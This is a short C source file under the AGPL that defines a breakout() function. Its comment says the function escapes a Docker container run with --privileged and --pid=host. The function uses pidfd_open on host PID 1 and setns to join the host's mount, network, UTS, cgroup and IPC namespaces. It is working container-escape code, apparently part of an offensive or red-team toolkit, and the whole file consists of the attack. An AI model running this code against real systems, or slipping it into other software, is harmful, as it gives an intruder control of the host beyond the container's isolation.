/**
 * Copyright (C) 2023 Andrew Rioux
 * 
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Affero General Public License as
 * published by the Free Software Foundation, either version 3 of the
 * License, or (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Affero General Public License for more details.
 * 
 * You should have received a copy of the GNU Affero General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#define _GNU_SOURCE
#include <sched.h>
#include <linux/sched.h>
// #include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>

/**
 * This function when run in a Docker container with the --privileged and --pid=host
 * flags is able to break out of a Docker container entirely
 */
int breakout(int *err_loc) {
    int fd = syscall(SYS_pidfd_open, 1, 0);

    if (fd < 0) {
        *err_loc = 1;
        return fd;
    }

    int result = setns(
        fd,
        CLONE_NEWNS | CLONE_NEWNET | CLONE_NEWUTS | CLONE_NEWCGROUP | CLONE_NEWIPC
    );

    if (result < 0) {
        *err_loc = 2;
        return result;
    }

    return 0;
}